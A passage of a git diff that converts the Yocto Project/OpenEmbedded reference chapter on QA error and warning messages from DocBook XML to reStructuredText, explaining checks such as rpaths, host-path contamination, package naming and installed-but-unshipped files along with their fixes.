+ cross-compilation" or "CROSS COMPILE Badness" in the specified log
+ file.
+
+  
+.. _qa-check-install-host-path:
+
+- ``<recipename>: The install log indicates that host include and/or library paths were used. Please check the log '<logfile>' for more information. [install-host-path]``
+
+ The log for the :ref:`ref-tasks-install` task
+ indicates that paths on the host were searched for files, which is
+ not appropriate when cross-compiling. Look for "is unsafe for
+ cross-compilation" or "CROSS COMPILE Badness" in the specified log
+ file.
+
+  
+.. _qa-check-configure-unsafe:
+
+- ``This autoconf log indicates errors, it looked at host include and/or library paths while determining system capabilities. Rerun configure task after fixing this. The path was '<path>'``
+
+ The log for the :ref:`ref-tasks-configure` task
+ indicates that paths on the host were searched for files, which is
+ not appropriate when cross-compiling. Look for "is unsafe for
+ cross-compilation" or "CROSS COMPILE Badness" in the specified log
+ file.
+
+  
+.. _qa-check-pkgname:
+
+- ``<packagename> doesn't match the [a-z0-9.+-]+ regex [pkgname]``
+
+ The convention within the OpenEmbedded build system (sometimes
+ enforced by the package manager itself) is to require that package
+ names are all lower case and to allow a restricted set of characters.
+ If your recipe name does not match this, or you add packages to
+ :term:`PACKAGES` that do not conform to the
+ convention, then you will receive this error. Rename your recipe. Or,
+ if you have added a non-conforming package name to ``PACKAGES``,
+ change the package name appropriately.
+
+  
+.. _qa-check-unknown-configure-option:
+
+- ``<recipe>: configure was passed unrecognized options: <options> [unknown-configure-option]``
+
+ The configure script is reporting that the specified options are
+ unrecognized. This situation could be because the options were
+ previously valid but have been removed from the configure script. Or,
+ there was a mistake when the options were added and there is another
+ option that should be used instead. If you are unsure, consult the
+ upstream build documentation, the ``./configure --help`` output, and
+ the upstream change log or release notes. Once you have worked out
+ what the appropriate change is, you can update
+ :term:`EXTRA_OECONF`,
+ :term:`PACKAGECONFIG_CONFARGS`, or the
+ individual :term:`PACKAGECONFIG` option values
+ accordingly.
+
+  
+.. _qa-check-pn-overrides:
+
+- ``Recipe <recipefile> has PN of "<recipename>" which is in OVERRIDES, this can result in unexpected behavior. [pn-overrides]``
+
+ The specified recipe has a name (:term:`PN`) value that
+ appears in :term:`OVERRIDES`. If a recipe is named
+ such that its ``PN`` value matches something already in ``OVERRIDES``
+ (e.g. ``PN`` happens to be the same as :term:`MACHINE`
+ or :term:`DISTRO`), it can have unexpected
+ consequences. For example, assignments such as
+ ``FILES_${PN} = "xyz"`` effectively turn into ``FILES = "xyz"``.
+ Rename your recipe (or if ``PN`` is being set explicitly, change the
+ ``PN`` value) so that the conflict does not occur. See
+ :term:`FILES` for additional information.
+
+  
+.. _qa-check-pkgvarcheck:
+
+- ``<recipefile>: Variable <variable> is set as not being package specific, please fix this. [pkgvarcheck]``
+
+ Certain variables (:term:`RDEPENDS`,
+ :term:`RRECOMMENDS`,
+ :term:`RSUGGESTS`,
+ :term:`RCONFLICTS`,
+ :term:`RPROVIDES`,
+ :term:`RREPLACES`, :term:`FILES`,
+ ``pkg_preinst``, ``pkg_postinst``, ``pkg_prerm``, ``pkg_postrm``, and
+ :term:`ALLOW_EMPTY`) should always be set specific
+ to a package (i.e. they should be set with a package name override
+ such as ``RDEPENDS_${PN} = "value"`` rather than
+ ``RDEPENDS = "value"``). If you receive this error, correct any
+ assignments to these variables within your recipe.
+
+  
+.. _qa-check-already-stripped:
+
+- ``File '<file>' from <recipename> was already stripped, this will prevent future debugging! [already-stripped]``
+
+ Produced binaries have already been stripped prior to the build
+ system extracting debug symbols. It is common for upstream software
+ projects to default to stripping debug symbols for output binaries.
+ In order for debugging to work on the target using ``-dbg`` packages,
+ this stripping must be disabled.
+
+ Depending on the build system used by the software being built,
+ disabling this stripping could be as easy as specifying an additional
+ configure option. If not, disabling stripping might involve patching
+ the build scripts. In the latter case, look for references to "strip"
+ or "STRIP", or the "-s" or "-S" command-line options being specified
+ on the linker command line (possibly through the compiler command
+ line if preceded with "-Wl,").
+
+ .. note::
+
+ Disabling stripping here does not mean that the final packaged
+ binaries will be unstripped. Once the OpenEmbedded build system
+ splits out debug symbols to the ``-dbg`` package, it will then
+ strip the symbols from the binaries.
+
+  
+.. _qa-check-packages-list:
+
+- ``<packagename> is listed in PACKAGES multiple times, this leads to packaging errors. [packages-list]``
+
+ Package names must appear only once in the
+ :term:`PACKAGES` variable. You might receive this
+ error if you are attempting to add a package to ``PACKAGES`` that is
+ already in the variable's value.
+
+  
+.. _qa-check-files-invalid:
+
+- ``FILES variable for package <packagename> contains '//' which is invalid. Attempting to fix this but you should correct the metadata. [files-invalid]``
+
+ The string "//" is invalid in a Unix path. Correct all occurrences
+ where this string appears in a :term:`FILES` variable so
+ that there is only a single "/".
+
+  
+.. _qa-check-installed-vs-shipped:
+
+- ``<recipename>: Files/directories were installed but not shipped in any package [installed-vs-shipped]``
+
+ Files have been installed within the
+ :ref:`ref-tasks-install` task but have not been
+ included in any package by way of the :term:`FILES`
+ variable. Files that do not appear in any package cannot be present
+ in an image later on in the build process. You need to do one of the
+ following:
+
+ - Add the files to ``FILES`` for the package you want them to appear
+ in (e.g. ``FILES_${``\ :term:`PN`\ ``}`` for the main
+ package).
+
+ - Delete the files at the end of the ``do_install`` task if the
+ files are not needed in any package.
+
+  
+
+- ``<oldpackage>-<oldpkgversion> was registered as shlib provider for <library>, changing it to <newpackage>-<newpkgversion> because it was built later``
+
+ This message means that both ``<oldpackage>`` and ``<newpackage>``
+ provide the specified shared library. You can expect this message
+ when a recipe has been renamed. However, if that is not the case, the
+ message might indicate that a private version of a library is being
+ erroneously picked up as the provider for a common library. If that
+ is the case, you should add the library's ``.so`` file name to
+ :term:`PRIVATE_LIBS` in the recipe that provides
+ the private version of the library.
+
+
+.. _qa-check-unlisted-pkg-lics:
+
+- ``LICENSE_<packagename> includes licenses (<licenses>) that are not listed in LICENSE [unlisted-pkg-lics]``
+
+ The :term:`LICENSE` of the recipe should be a superset
+ of all the licenses of all packages produced by this recipe. In other
+ words, any license in ``LICENSE_*`` should also appear in
+ :term:`LICENSE`.
+
+  
+
+Configuring and Disabling QA Checks
+===================================
+
+You can configure the QA checks globally so that specific check failures
+either raise a warning or an error message, using the
+:term:`WARN_QA` and :term:`ERROR_QA`
+variables, respectively. You can also disable checks within a particular
+recipe using :term:`INSANE_SKIP`. For information on
+how to work with the QA checks, see the
+":ref:`insane.bbclass <ref-classes-insane>`" section.
+
+.. note::
+
+ Please keep in mind that the QA checks exist in order to detect real
+ or potential problems in the packaged output. So exercise caution
+ when disabling these checks.
diff --git a/documentation/ref-manual/ref-qa-checks.xml b/documentation/ref-manual/ref-qa-checks.xml
deleted file mode 100644
index 515106ae68..0000000000
--- a/documentation/ref-manual/ref-qa-checks.xml
+++ /dev/null
@@ -1,1199 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='ref-qa-checks'>
-<title>QA Error and Warning Messages</title>
-
-<section id='qa-introduction'>
- <title>Introduction</title>
-
- <para>
- When building a recipe, the OpenEmbedded build system performs
- various QA checks on the output to ensure that common issues are
- detected and reported.
- Sometimes when you create a new recipe to build new software,
- it will build with no problems.
- When this is not the case, or when you have QA issues building any
- software, it could take a little time to resolve them.
- </para>
-
- <para>
- While it is tempting to ignore a QA message or even to
- disable QA checks, it is best to try and resolve any
- reported QA issues.
- This chapter provides a list of the QA messages and brief explanations
- of the issues you could encounter so that you can properly resolve
- problems.
- </para>
-
- <para>
- The next section provides a list of all QA error and warning
- messages based on a default configuration.
- Each entry provides the message or error form along with an
- explanation.
- <note>
- <title>Notes</title>
- <itemizedlist>
- <listitem><para>
- At the end of each message, the name of the associated
- QA test (as listed in the
- "<link linkend='ref-classes-insane'><filename>insane.bbclass</filename></link>"
- section) appears within square brackets.
- </para></listitem>
- <listitem><para>
- As mentioned, this list of error and warning messages is for
- QA checks only.
- The list does not cover all possible build errors or
- warnings you could encounter.
- </para></listitem>
- <listitem><para>
- Because some QA checks are disabled by default, this list
- does not include all possible QA check errors and warnings.
- </para></listitem>
- </itemizedlist>
- </note>
- </para>
-</section>
-
-<section id='qa-errors-and-warnings'>
- <title>Errors and Warnings</title>
-
-<!--
-This section uses the <para><code> construct to enable permalinks for the
-various QA issue and warning messages. The file templates/qa-code-permalinks.xsl
-is used to locate the construct and generate the permalink. This solution
-leverages the fact that right now this section in the ref-manual is the only
-place is all the YP docs that uses the <para><code> construct. If, in the
-future, that construct were to appear in the ref-manual, a generic permalink
-would be generated for the text between <code></code>. If a better solution
-can be found then it should be implemented. I can't find one at the moment.
--->
-
- <para>
- <itemizedlist>
- <listitem>
- <para id='qa-issue-libexec'>
- <code>
- &lt;packagename&gt;: &lt;path&gt; is using libexec please relocate to &lt;libexecdir&gt; [libexec]
- </code>
- </para>
-
- <para>
- The specified package contains files in
- <filename>/usr/libexec</filename> when the distro
- configuration uses a different path for
- <filename>&lt;libexecdir&gt;</filename>
- By default, <filename>&lt;libexecdir&gt;</filename> is
- <filename>$prefix/libexec</filename>.
- However, this default can be changed (e.g.
- <filename>${libdir}</filename>).
- </para>
-
- <para>
- &nbsp;
- </para>
- </listitem>
- </itemizedlist>
- </para>
-
- <para>
- <itemizedlist>
- <listitem>
- <para id='qa-issue-rpaths'>
- <code>
- package &lt;packagename&gt; contains bad RPATH &lt;rpath&gt; in file &lt;file&gt; [rpaths]
- </code>
- </para>
-
- <para>
- The specified binary produced by the recipe contains dynamic
- library load paths (rpaths) that contain build system paths
- such as
- <link linkend='var-TMPDIR'><filename>TMPDIR</filename></link>,
- which are incorrect for the target and could potentially
- be a security issue.
- Check for bad <filename>-rpath</filename> options being
- passed to the linker in your
- <link linkend='ref-tasks-compile'><filename>do_compile</filename></link>
- log.
- Depending on the build system used by the software being
- built, there might be a configure option to disable rpath
- usage completely within the build of the software.
- </para>
-
- <para>
- &nbsp;
- </para>
- </listitem>
- </itemizedlist>
- </para>
-
- <para>
- <itemizedlist>
- <listitem>
- <para id='qa-issue-useless-rpaths'>
- <code>
- &lt;packagename&gt;: &lt;file&gt; contains probably-redundant RPATH &lt;rpath&gt; [useless-rpaths]
- </code>
- </para>
-
- <para>
- The specified binary produced by the recipe contains dynamic
- library load paths (rpaths) that on a standard system are
- searched by default by the linker (e.g.
- <filename>/lib</filename> and <filename>/usr/lib</filename>).
- While these paths will not cause any breakage, they do waste
- space and are unnecessary.
- Depending on the build system used by the software being
- built, there might be a configure option to disable rpath
- usage completely within the build of the software.
- </para>
-
- <para>
- &nbsp;
- </para>
- </listitem>
- </itemizedlist>
- </para>
-
- <para>
- <itemizedlist>
- <listitem>
- <para id='qa-issue-file-rdeps'>
- <code>
- &lt;packagename&gt; requires &lt;files&gt;, but no providers in its RDEPENDS [file-rdeps]
- </code>
- </para>
-
- <para>
- A file-level dependency has been identified from the
- specified package on the specified files, but there is
- no explicit corresponding entry in
- <link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>.
- If particular files are required at runtime then
- <filename>RDEPENDS</filename> should be declared in the
- recipe to ensure the packages providing them are built.
- </para>
-
- <para>
- &nbsp;
- </para>
- </listitem>
- </itemizedlist>
- </para>
-
- <para>
- <itemizedlist>
- <listitem>
- <para id='qa-issue-build-deps'>
- <code>
- &lt;packagename1&gt; rdepends on &lt;packagename2&gt;, but it isn't a build dependency? [build-deps]
- </code>
- </para>
-
- <para>
- A runtime dependency exists between the two specified
- packages, but there is nothing explicit within the recipe
- to enable the OpenEmbedded build system to ensure that
- dependency is satisfied.
- This condition is usually triggered by an
- <link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>
- value being added at the packaging stage rather than up
- front, which is usually automatic based on the contents of
- the package.
- In most cases, you should change the recipe to add an
- explicit <filename>RDEPENDS</filename> for the dependency.
- </para>
-
- <para>
- &nbsp;
- </para>
- </listitem>
- </itemizedlist>
- </para>
-
- <para>
- <itemizedlist>
- <listitem>
- <para id='qa-issue-dev-so'>
- <code>
- non -dev/-dbg/nativesdk- package contains symlink .so: &lt;packagename&gt; path '&lt;path&gt;' [dev-so]
- </code>
- </para>
-
- <para>
- Symlink <filename>.so</filename> files are for development
- only, and should therefore go into the
- <filename>-dev</filename> package.
- This situation might occur if you add
- <filename>*.so*</filename> rather than
- <filename>*.so.*</filename> to a non-dev package.
- Change
- <link linkend='var-FILES'><filename>FILES</filename></link>
- (and possibly
- <link linkend='var-PACKAGES'><filename>PACKAGES</filename></link>)
- such that the specified <filename>.so</filename> file goes
- into an appropriate <filename>-dev</filename> package.
- </para>
-
- <para>
- &nbsp;
- </para>
- </listitem>
- </itemizedlist>
- </para>
-
- <para>
- <itemizedlist>
- <listitem>
- <para id='qa-issue-staticdev'>
- <code>
- non -staticdev package contains static .a library: &lt;packagename&gt; path '&lt;path&gt;' [staticdev]
- </code>
- </para>
-
- <para>
- Static <filename>.a</filename> library files should go into
- a <filename>-staticdev</filename> package.
- Change
- <link linkend='var-FILES'><filename>FILES</filename></link>
- (and possibly
- <link linkend='var-PACKAGES'><filename>PACKAGES</filename></link>)
- such that the specified <filename>.a</filename> file goes
- into an appropriate <filename>-staticdev</filename> package.
- </para>
-
- <para>
- &nbsp;
- </para>
- </listitem>
- </itemizedlist>
- </para>
-
- <para>
- <itemizedlist>
- <listitem>
- <para id='qa-issue-libdir'>
- <code>
- &lt;packagename&gt;: found library in wrong location [libdir]
- </code>
- </para>
-
- <para>
- The specified file may have been installed into an incorrect
- (possibly hardcoded) installation path.
- For example, this test will catch recipes that install
- <filename>/lib/bar.so</filename> when
- <filename>${base_libdir}</filename> is "lib32".
- Another example is when recipes install
- <filename>/usr/lib64/foo.so</filename> when
- <filename>${libdir}</filename> is "/usr/lib".
- False positives occasionally exist.
- For these cases add "libdir" to
- <link linkend='var-INSANE_SKIP'><filename>INSANE_SKIP</filename></link>
- for the package.
- </para>
-
- <para>
- &nbsp;
- </para>
- </listitem>
- </itemizedlist>
- </para>
-
- <para>
- <itemizedlist>
- <listitem>
- <para id='qa-issue-debug-files'>
- <code>
- non debug package contains .debug directory: &lt;packagename&gt; path &lt;path&gt; [debug-files]
- </code>
- </para>
-
- <para>
- The specified package contains a
- <filename>.debug</filename> directory, which should not
- appear in anything but the <filename>-dbg</filename>
- package.
- This situation might occur if you add a path which contains
- a <filename>.debug</filename> directory and do not
- explicitly add the <filename>.debug</filename> directory
- to the <filename>-dbg</filename> package.
- If this is the case, add the <filename>.debug</filename>
- directory explicitly to
- <filename>FILES_${PN}-dbg</filename>.
- See
- <link linkend='var-FILES'><filename>FILES</filename></link>
- for additional information on <filename>FILES</filename>.
- </para>
-
- <para>
- &nbsp;
- </para>
- </listitem>
- </itemizedlist>
- </para>
-
- <para>
- <itemizedlist>
- <listitem>
- <para id='qa-issue-arch'>
- <code>
- Architecture did not match (&lt;machine_arch&gt; to &lt;file_arch&gt;) on &lt;file&gt; [arch]
- </code>
- </para>
-
- <para>
- By default, the OpenEmbedded build system checks the
- Executable and Linkable Format (ELF) type, bit size, and
- endianness of any binaries to ensure they match the
- target architecture.
- This test fails if any binaries do not match the type since
- there would be an incompatibility.
- The test could indicate that the wrong compiler or compiler
- options have been used.
- Sometimes software, like bootloaders, might need to
- bypass this check.
- If the file you receive the error for is firmware
- that is not intended to be executed within the target
- operating system or is intended to run on a separate
- processor within the device, you can add "arch" to
- <link linkend='var-INSANE_SKIP'><filename>INSANE_SKIP</filename></link>
- for the package.
- Another option is to check the
- <link linkend='ref-tasks-compile'><filename>do_compile</filename></link>
- log and verify that the compiler options being used
- are correct.
- </para>
-
- <para>
- &nbsp;
- </para>
- </listitem>
- </itemizedlist>
- </para>
-
- <para>
- <itemizedlist>
- <listitem>
- <para id='qa-issue-arch-bit-size-no-match'>
- <code>
- Bit size did not match (&lt;machine_bits&gt; to &lt;file_bits&gt;) &lt;recipe&gt; on &lt;file&gt; [arch]
- </code>
- </para>
-
- <para>
- By default, the OpenEmbedded build system checks
- the Executable and Linkable Format (ELF) type,
- bit size, and endianness of any binaries to ensure
- they match the target architecture.
- This test fails if any binaries do not match the type since
- there would be an incompatibility.
- The test could indicate that the wrong compiler or compiler
- options have been used.
- Sometimes software, like bootloaders, might need to
- bypass this check.
- If the file you receive the error for is firmware that
- is not intended to be executed within the target
- operating system or is intended to run on a separate
- processor within the device, you can add "arch" to
- <link linkend='var-INSANE_SKIP'><filename>INSANE_SKIP</filename></link>
- for the package.
- Another option is to check the
- <link linkend='ref-tasks-compile'><filename>do_compile</filename></link>
- log and verify that the compiler options being used are
- correct.
- </para>
-
- <para>
- &nbsp;
- </para>
- </listitem>
- </itemizedlist>
- </para>
-
- <para>
- <itemizedlist>
- <listitem>
- <para id='qa-issue-arch-endianness-no-match'>
- <code>
- Endianness did not match (&lt;machine_endianness&gt; to &lt;file_endianness&gt;) on &lt;file&gt; [arch]
- </code>
- </para>
-
- <para>
- By default, the OpenEmbedded build system checks
- the Executable and Linkable Format (ELF) type, bit
- size, and endianness of any binaries to ensure they
- match the target architecture.
- This test fails if any binaries do not match the type since
- there would be an incompatibility.
- The test could indicate that the wrong compiler or compiler
- options have been used.
- Sometimes software, like bootloaders, might need to
- bypass this check.
- If the file you receive the error for is firmware
- that is not intended to be executed within the target
- operating system or is intended to run on a separate
- processor within the device, you can add "arch" to
- <link linkend='var-INSANE_SKIP'><filename>INSANE_SKIP</filename></link>
- for the package.
- Another option is to check the
- <link linkend='ref-tasks-compile'><filename>do_compile</filename></link>
- log and verify that the compiler options being used
- are correct.
- </para>
-
- <para>
- &nbsp;
- </para>
- </listitem>
- </itemizedlist>
- </para>
-
- <para>
- <itemizedlist>
- <listitem>
- <para id='qa-issue-textrel'>
- <code>
- ELF binary '&lt;file&gt;' has relocations in .text [textrel]
- </code>
- </para>
-
- <para>
- The specified ELF binary contains relocations in its
- <filename>.text</filename> sections.
- This situation can result in a performance impact
- at runtime.
- </para>
-
- <para>
- Typically, the way to solve this performance issue is to
- add "-fPIC" or "-fpic" to the compiler command-line
- options.
- For example, given software that reads
- <link linkend='var-CFLAGS'><filename>CFLAGS</filename></link>
- when you build it, you could add the following to your
- recipe:
- <literallayout class='monospaced'>
- CFLAGS_append = " -fPIC "
- </literallayout>
- </para>
-
- <para>
- For more information on text relocations at runtime, see
- <ulink url='http://www.akkadia.org/drepper/textrelocs.html'></ulink>.
- </para>
-
- <para>
- &nbsp;
- </para>
- </listitem>
- </itemizedlist>
- </para>
-
- <para>
- <itemizedlist>
- <listitem>
- <para id='qa-issue-ldflags'>
- <code>
- No GNU_HASH in the elf binary: '&lt;file&gt;' [ldflags]
- </code>
- </para>
-
- <para>
- This indicates that binaries produced when building the
- recipe have not been linked with the
- <link linkend='var-LDFLAGS'><filename>LDFLAGS</filename></link>
- options provided by the build system.
- Check to be sure that the <filename>LDFLAGS</filename>
- variable is being passed to the linker command.
- A common workaround for this situation is to pass in
- <filename>LDFLAGS</filename> using
- <link linkend='var-TARGET_CC_ARCH'><filename>TARGET_CC_ARCH</filename></link>
- within the recipe as follows:
- <literallayout class='monospaced'>
- TARGET_CC_ARCH += "${LDFLAGS}"
- </literallayout>
- </para>
-
- <para>
- &nbsp;
- </para>
- </listitem>
- </itemizedlist>
- </para>
-
- <para>
- <itemizedlist>
- <listitem>
- <para id='qa-issue-xorg-driver-abi'>
- <code>
- Package &lt;packagename&gt; contains Xorg driver (&lt;driver&gt;) but no xorg-abi- dependencies [xorg-driver-abi]
- </code>
- </para>
-
- <para>
- The specified package contains an Xorg driver, but does not
- have a corresponding ABI package dependency.
- The xserver-xorg recipe provides driver ABI names.
- All drivers should depend on the ABI versions that they have
- been built against.
- Driver recipes that include
- <filename>xorg-driver-input.inc</filename> or
- <filename>xorg-driver-video.inc</filename> will
- automatically get these versions.
- Consequently, you should only need to explicitly add
- dependencies to binary driver recipes.
- </para>
-
- <para>
- &nbsp;
- </para>
- </listitem>
- </itemizedlist>
- </para>
-
- <para>
- <itemizedlist>
- <listitem>
- <para id='qa-issue-infodir'>
- <code>
- The /usr/share/info/dir file is not meant to be shipped in a particular package. [infodir]
- </code>
- </para>
-
- <para>
- The <filename>/usr/share/info/dir</filename> should not be
- packaged.
- Add the following line to your
- <link linkend='ref-tasks-install'><filename>do_install</filename></link>
- task or to your <filename>do_install_append</filename>
- within the recipe as follows:
- <literallayout class='monospaced'>
- rm ${D}${infodir}/dir
- </literallayout>
- </para>
-
- <para>
- &nbsp;
- </para>
- </listitem>
- </itemizedlist>
- </para>
-
- <para>
- <itemizedlist>
- <listitem>
- <para id='qa-issue-symlink-to-sysroot'>
- <code>
- Symlink &lt;path&gt; in &lt;packagename&gt; points to TMPDIR [symlink-to-sysroot]
- </code>
- </para>
-
- <para>
- The specified symlink points into
- <link linkend='var-TMPDIR'><filename>TMPDIR</filename></link>
- on the host.
- Such symlinks will work on the host.
- However, they are clearly invalid when running on
- the target.
- You should either correct the symlink to use a relative
- path or remove the symlink.
- </para>
-
- <para>
- &nbsp;
- </para>
- </listitem>
- </itemizedlist>
- </para>
-
- <para>
- <itemizedlist>
- <listitem>
- <para id='qa-issue-la'>
- <code>
- &lt;file&gt; failed sanity test (workdir) in path &lt;path&gt; [la]
- </code>
- </para>
-
- <para>
- The specified <filename>.la</filename> file contains
- <link linkend='var-TMPDIR'><filename>TMPDIR</filename></link>
- paths.
- Any <filename>.la</filename> file containing these paths
- is incorrect since <filename>libtool</filename> adds the
- correct sysroot prefix when using the files automatically
- itself.
- </para>
-
- <para>
- &nbsp;
- </para>
- </listitem>
- </itemizedlist>
- </para>
-
- <para>
- <itemizedlist>
- <listitem>
- <para id='qa-issue-pkgconfig'>
- <code>
- &lt;file&gt; failed sanity test (tmpdir) in path &lt;path&gt; [pkgconfig]
- </code>
- </para>
-
- <para>
- The specified <filename>.pc</filename> file contains
- <link linkend='var-TMPDIR'><filename>TMPDIR</filename></link><filename>/</filename><link linkend='var-WORKDIR'><filename>WORKDIR</filename></link>
- paths.
- Any <filename>.pc</filename> file containing these paths is
- incorrect since <filename>pkg-config</filename> itself adds
- the correct sysroot prefix when the files are accessed.
- </para>
-
- <para>
- &nbsp;
- </para>
- </listitem>
- </itemizedlist>
- </para>
-
- <para>
- <itemizedlist>
- <listitem>
- <para id='qa-issue-debug-deps'>
- <code>
- &lt;packagename&gt; rdepends on &lt;debug_packagename&gt; [debug-deps]
- </code>
- </para>
-
- <para>
- A dependency exists between the specified non-dbg package
- (i.e. a package whose name does not end in
- <filename>-dbg</filename>) and a package that is a
- <filename>dbg</filename> package.
- The <filename>dbg</filename> packages contain
- debug symbols and are brought in using several
- different methods:
- <itemizedlist>
- <listitem><para>
- Using the <filename>dbg-pkgs</filename>
- <link linkend='var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></link>
- value.
- </para></listitem>
- <listitem><para>
- Using
- <link linkend='var-IMAGE_INSTALL'><filename>IMAGE_INSTALL</filename></link>.
- </para></listitem>
- <listitem><para>
- As a dependency of another
- <filename>dbg</filename> package that was brought
- in using one of the above methods.
- </para></listitem>
- </itemizedlist>
- The dependency might have been automatically added
- because the <filename>dbg</filename> package erroneously
- contains files that it should not contain (e.g. a
- non-symlink <filename>.so</filename> file) or it might
- have been added manually (e.g. by adding to
- <link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>).
- </para>
-
- <para>
- &nbsp;
- </para>
- </listitem>
- </itemizedlist>
- </para>
-
- <para>
- <itemizedlist>
- <listitem>
- <para id='qa-issue-dev-deps'>
- <code>
- &lt;packagename&gt; rdepends on &lt;dev_packagename&gt; [dev-deps]
- </code>
- </para>
-
- <para>
- A dependency exists between the specified non-dev package
- (a package whose name does not end in
- <filename>-dev</filename>) and a package that is a
- <filename>dev</filename> package.
- The <filename>dev</filename> packages contain development
- headers and are usually brought in using several different
- methods:
- <itemizedlist>
- <listitem><para>
- Using the <filename>dev-pkgs</filename>
- <link linkend='var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></link>
- value.
- </para></listitem>
- <listitem><para>
- Using
- <link linkend='var-IMAGE_INSTALL'><filename>IMAGE_INSTALL</filename></link>.
- </para></listitem>
- <listitem><para>
- As a dependency of another
- <filename>dev</filename> package that was brought
- in using one of the above methods.
- </para></listitem>
- </itemizedlist>
- The dependency might have been automatically added (because
- the <filename>dev</filename> package erroneously contains
- files that it should not have (e.g. a non-symlink
- <filename>.so</filename> file) or it might have been added
- manually (e.g. by adding to
- <link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>).
- </para>
-
- <para>
- &nbsp;
- </para>
- </listitem>
- </itemizedlist>
- </para>
-
- <para>
- <itemizedlist>
- <listitem>
- <para id='qa-issue-dep-cmp'>
- <code>
- &lt;var&gt;_&lt;packagename&gt; is invalid: &lt;comparison&gt; (&lt;value&gt;) only comparisons &lt;, =, &gt;, &lt;=, and &gt;= are allowed [dep-cmp]
- </code>
- </para>
-
- <para>
- If you are adding a versioned dependency relationship to one
- of the dependency variables
- (<link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>,
- <link linkend='var-RRECOMMENDS'><filename>RRECOMMENDS</filename></link>,
- <link linkend='var-RSUGGESTS'><filename>RSUGGESTS</filename></link>,
- <link linkend='var-RPROVIDES'><filename>RPROVIDES</filename></link>,
- <link linkend='var-RREPLACES'><filename>RREPLACES</filename></link>,
- or
- <link linkend='var-RCONFLICTS'><filename>RCONFLICTS</filename></link>),
- you must only use the named comparison operators.
- Change the versioned dependency values you are adding
- to match those listed in the message.
- </para>
-
- <para>
- &nbsp;
- </para>
- </listitem>
- </itemizedlist>
- </para>
-
- <para>
- <itemizedlist>
- <listitem>
- <para id='qa-issue-compile-host-path'>
- <code>
- &lt;recipename&gt;: The compile log indicates that host include and/or library paths were used. Please check the log '&lt;logfile&gt;' for more information. [compile-host-path]
- </code>
- </para>
-
- <para>
- The log for the
- <link linkend='ref-tasks-compile'><filename>do_compile</filename></link>
- task indicates that paths on the host were searched
- for files, which is not appropriate when cross-compiling.
- Look for "is unsafe for cross-compilation" or "CROSS COMPILE
- Badness" in the specified log file.
- </para>
-
- <para>
- &nbsp;
- </para>
- </listitem>
- </itemizedlist>
- </para>
-
- <para>
- <itemizedlist>
- <listitem>
- <para id='qa-issue-install-host-path'>
- <code>
- &lt;recipename&gt;: The install log indicates that host include and/or library paths were used. Please check the log '&lt;logfile&gt;' for more information. [install-host-path]
- </code>
- </para>
-
- <para>
- The log for the
- <link linkend='ref-tasks-install'><filename>do_install</filename></link>
- task indicates that paths on the host were searched
- for files, which is not appropriate when cross-compiling.
- Look for "is unsafe for cross-compilation"
- or "CROSS COMPILE Badness" in the specified log file.
- </para>
-
- <para>
- &nbsp;
- </para>
- </listitem>
- </itemizedlist>
- </para>
-
- <para>
- <itemizedlist>
- <listitem>
- <para id='qa-issue-autoconf-log'>
- <code>
- This autoconf log indicates errors, it looked at host include and/or library paths while determining system capabilities. Rerun configure task after fixing this. The path was '&lt;path&gt;'
- </code>
- </para>
-
- <para>
- The log for the
- <link linkend='ref-tasks-configure'><filename>do_configure</filename></link>
- task indicates that paths on the host were searched
- for files, which is not appropriate when cross-compiling.
- Look for "is unsafe for cross-compilation" or
- "CROSS COMPILE Badness" in the specified log file.
- </para>
-
- <para>
- &nbsp;
- </para>
- </listitem>
- </itemizedlist>
- </para>
-
- <para>
- <itemizedlist>
- <listitem>
- <para id='qa-issue-pkgname'>
- <code>
- &lt;packagename&gt; doesn't match the [a-z0-9.+-]+ regex [pkgname]
- </code>
- </para>
-
- <para>
- The convention within the OpenEmbedded build system
- (sometimes enforced by the package manager itself) is to
- require that package names are all lower case
- and to allow a restricted set of characters.
- If your recipe name does not match this, or you add
- packages to
- <link linkend='var-PACKAGES'><filename>PACKAGES</filename></link>
- that do not conform to the convention, then you
- will receive this error.
- Rename your recipe.
- Or, if you have added a non-conforming package name to
- <filename>PACKAGES</filename>, change the package name
- appropriately.
- </para>
-
- <para>
- &nbsp;
- </para>
- </listitem>
- </itemizedlist>
- </para>
-
- <para>
- <itemizedlist>
- <listitem>
- <para id='qa-issue-unknown-configure-option'>
- <code>
- &lt;recipe&gt;: configure was passed unrecognized options: &lt;options&gt; [unknown-configure-option]
- </code>
- </para>
-
- <para>
- The configure script is reporting that the specified
- options are unrecognized.
- This situation could be because the options
- were previously valid but have been removed from the
- configure script.
- Or, there was a mistake when the options were added
- and there is another option that should be used instead.
- If you are unsure, consult the upstream build
- documentation, the
- <filename>./configure --help</filename> output,
- and the upstream change log or release notes.
- Once you have worked out what the appropriate
- change is, you can update
- <link linkend='var-EXTRA_OECONF'><filename>EXTRA_OECONF</filename></link>,
- <link linkend='var-PACKAGECONFIG_CONFARGS'><filename>PACKAGECONFIG_CONFARGS</filename></link>,
- or the individual
- <link linkend='var-PACKAGECONFIG'><filename>PACKAGECONFIG</filename></link>
- option values accordingly.
- </para>
-
- <para>
- &nbsp;
- </para>
- </listitem>
- </itemizedlist>
- </para>
-
- <para>
- <itemizedlist>
- <listitem>
- <para id='qa-issue-pn-overrides'>
- <code>
- Recipe &lt;recipefile&gt; has PN of "&lt;recipename&gt;" which is in OVERRIDES, this can result in unexpected behavior. [pn-overrides]
- </code>
- </para>
-
- <para>
- The specified recipe has a name
- (<link linkend='var-PN'><filename>PN</filename></link>)
- value that appears in
- <link linkend='var-OVERRIDES'><filename>OVERRIDES</filename></link>.
- If a recipe is named such that its <filename>PN</filename>
- value matches something already in
- <filename>OVERRIDES</filename> (e.g. <filename>PN</filename>
- happens to be the same as
- <link linkend='var-MACHINE'><filename>MACHINE</filename></link>
- or
- <link linkend='var-DISTRO'><filename>DISTRO</filename></link>),
- it can have unexpected consequences.
- For example, assignments such as
- <filename>FILES_${PN} = "xyz"</filename> effectively
